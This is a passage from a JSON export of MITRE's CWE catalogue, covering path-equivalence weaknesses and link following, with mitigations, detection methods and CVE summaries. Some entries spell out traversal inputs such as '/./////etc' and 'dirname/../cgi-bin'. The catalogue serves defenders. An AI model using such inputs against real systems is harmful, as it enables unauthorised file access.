(\'\\\\multiple\\\\trailing\\\\\\\\slash\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"165","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\\\\multiple\\\\\\\\internal\\\\backslash"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Multiple Internal Backslash - \\\\multiple\\\\\\\\internal\\\\backslash","attr":{"@_Date":"2008-04-11"}}}},"54":{"attr":{"@_ID":"54","@_Name":"Path Equivalence: \'filedir\\\\\' (Trailing Backslash)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of trailing backslash (\'filedir\\\\\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"162","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-0847","Description":"ASP.NET allows remote attackers to bypass authentication for .aspx files in restricted directories via a request containing a (1) \\"\\\\\\" (backslash) or (2) \\"%5C\\" (encoded backslash), aka \\"Path Validation Vulnerability.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0847"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"filedir\\\\ (trailing backslash)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Trailing Backslash - (filedir\\\\)","attr":{"@_Date":"2008-04-11"}}}},"55":{"attr":{"@_ID":"55","@_Name":"Path Equivalence: \'/./\' (Single Dot Directory)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of single dot directory exploit (\'/./\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0004","Description":"Server allows remote attackers to read source code for executable files by inserting a . (dot) into the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0004"},{"Reference":"CVE-2002-0304","Description":"Server allows remote attackers to read password-protected files via a /./ in the HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0304"},{"Reference":"BID:6042","Description":"Input Validation error","Link":"http://www.securityfocus.com/bid/6042"},{"Reference":"CVE-1999-1083","Description":"Possibly (could be a cleansing error)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1083"},{"Reference":"CVE-2004-0815","Description":"\\"/./////etc\\" cleansed to \\".///etc\\" then \\"/etc\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0815"},{"Reference":"CVE-2002-0112","Description":"Server allows remote attackers to view password protected files via /./ in the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0112"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"/./ (single dot directory)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Single Dot Directory - /./","attr":{"@_Date":"2008-04-11"}}}},"56":{"attr":{"@_ID":"56","@_Name":"Path Equivalence: \'filedir*\' (Wildcard)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of asterisk wildcard (\'filedir*\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"155","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0696","Description":"List directories using desired path and \\"*\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0696"},{"Reference":"CVE-2002-0433","Description":"List files in web server using \\"*.ext\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0433"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"filedir* (asterisk / wildcard)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Asterisk Wildcard - filedir*","attr":{"@_Date":"2008-04-11"}}}},"57":{"attr":{"@_ID":"57","@_Name":"Path Equivalence: \'fakedir/../realdir/filename\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains protection mechanisms to restrict access to \'realdir/filename\', but it constructs pathnames using external input in the form of \'fakedir/../realdir/filename\' that are not handled by those mechanisms. This allows attackers to perform unauthorized actions against the targeted file.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1152","Description":"Proxy allows remote attackers to bypass denylist restrictions and connect to unauthorized web servers by modifying the requested URL, including (1) a // (double slash), (2) a /SUBDIR/.. where the desired file is in the parentdir, (3) a /./, or (4) URL-encoded characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1152"},{"Reference":"CVE-2000-0191","Description":"application check access for restricted URL before canonicalization","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0191"},{"Reference":"CVE-2005-1366","Description":"CGI source disclosure using \\"dirname/../cgi-bin\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1366"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"dirname/fakechild/../realchild/filename"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Notes":{"Note":{"#text":"This is a manipulation that uses an injection for one consequence (containment violation using relative path) to achieve a different consequence (equivalence by alternate name).","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, Observed_Examples, Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Path Issue - dirname/fakechild/../realchild/filename","attr":{"@_Date":"2008-04-11"}},{"#text":"Path Equivalence: \'dirname/fakechild/../realchild/filename\'","attr":{"@_Date":"2008-10-14"}}]}},"58":{"attr":{"@_ID":"58","@_Name":"Path Equivalence: Windows 8.3 Filename","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a protection mechanism that restricts access to a long filename on a Windows operating system, but the software does not properly restrict access to the equivalent short \\"8.3\\" filename.","Extended_Description":"On later Windows operating systems, a file can have a \\"long name\\" and a short name that is compatible with older Windows file systems, with up to 8 characters in the filename and 3 characters for the extension. These \\"8.3\\" filenames, therefore, act as an alternate name for files with long names, so they are useful pathname equivalence manipulations.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"Disable Windows from supporting 8.3 filenames by editing the Windows registry. Preventing 8.3 filenames will not remove previously generated 8.3 filenames."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0012","Description":"Multiple web servers allow restriction bypass using 8.3 names instead of long names","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0012"},{"Reference":"CVE-2001-0795","Description":"Source code disclosure using 8.3 file name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0795"},{"Reference":"CVE-2005-0471","Description":"Multi-Factor Vulnerability. Product generates temporary filenames using long filenames, which become predictable in 8.3 format.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0471"}]},"Functional_Areas":{"Functional_Area":"File Processing"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Windows 8.3 Filename"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 11, &#34;DOS 8.3 Filenames&#34;, Page 673"}}]},"Notes":{"Note":{"#text":"Probably under-studied","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Windows 8.3 Filename","attr":{"@_Date":"2008-04-11"}}}},"59":{"attr":{"@_ID":"59","@_Name":"Improper Link Resolution Before File Access (\'Link Following\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":[{"attr":{"@_Class":"Windows","@_Prevalence":"Sometimes"}},{"attr":{"@_Class":"Unix","@_Prevalence":"Often"}}]},"Background_Details":{"Background_Detail":"Soft links are a UNIX term that is synonymous with simple shortcuts on windows based platforms."},"Alternate_Terms":{"Alternate_Term":{"Term":"insecure temporary file","Description":"Some people use the phrase \\"insecure temporary file\\" when referring to a link following weakness, but other weaknesses can produce insecure temporary files without any symlink involvement at all."}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":["Read Files or Directories","Modify Files or Directories","Bypass Protection Mechanism"],"Note":"An attacker may be able to traverse the file system to unintended locations and read or overwrite the contents of unexpected files. If the files are used for a security mechanism then an attacker may be able to bypass the mechanism."},{"Scope":"Other","Impact":"Execute Unauthorized Code or Commands","Note":"Windows simple shortcuts, sometimes referred to as soft links, can be exploited remotely since a \\".LNK\\" file can be uploaded like a normal file. This can enable remote execution."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Bytecode Weakness Analysis - including disassembler + source code weakness analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-48.1"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Follow the principle of least privilege when assigning access rights to entities in a software system.","Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted."]}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1386","Description":"Some versions of Perl follows symbolic links when running with the -e option, which allows local users to overwrite arbitrary files via a symlink attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1386"},{"Reference":"CVE-2000-1178","Description":"Text editor follows symbolic links when creating a rescue copy during an abnormal exit, which allows local users to overwrite the files of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1178"},{"Reference":"CVE-2004-0217","Description":"Antivirus update allows local users to create or append to arbitrary files via a symlink attack on a logfile.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0217"},{"Reference":"CVE-2003-0517","Description":"Symlink attack allows local users to overwrite files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0517"},{"Reference":"CVE-2004-0689","Description":"Window manager does not properly handle when certain symbolic links point to \\"stale\\" locations, which could allow local users to create or truncate arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0689"},{"Reference":"CVE-2005-1879","Description":"Second-order symlink vulnerabilities","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1879"},{"Reference":"CVE-2005-1880","Description":"Second-order symlink vulnerabilities","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1880"},{"Reference":"CVE-2005-1916","Description":"Symlink in Python program","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1916"},{"Reference":"CVE-2000-0972","Description":"Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0972"},{"Reference":"CVE-2005-0824","Description":"Signal causes a dump that follows symlinks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0824"},{"Reference":"CVE-2001-1494","Description":"Hard link attack, file overwrite; interesting because program checks against soft links","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1494"},{"Reference":"CVE-2002-0793","Description":"Hard link and possibly symbolic link following vulnerabilities in embedded operating system allow local users to overwrite arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0793"},{"Reference":"CVE-2003-0578","Description":"Server creates hard links and unlinks files as root, which allows local users to gain privileges by deleting and overwriting arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0578"},{"Reference":"CVE-1999-0783","Description":"Operating system allows local users to conduct a denial of service by creating a hard link from a device special file to a file on an NFS file system.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0783"},{"Reference":"CVE-2004-1603","Description":"Web hosting manager follows hard links, which allows local users to read or modify arbitrary 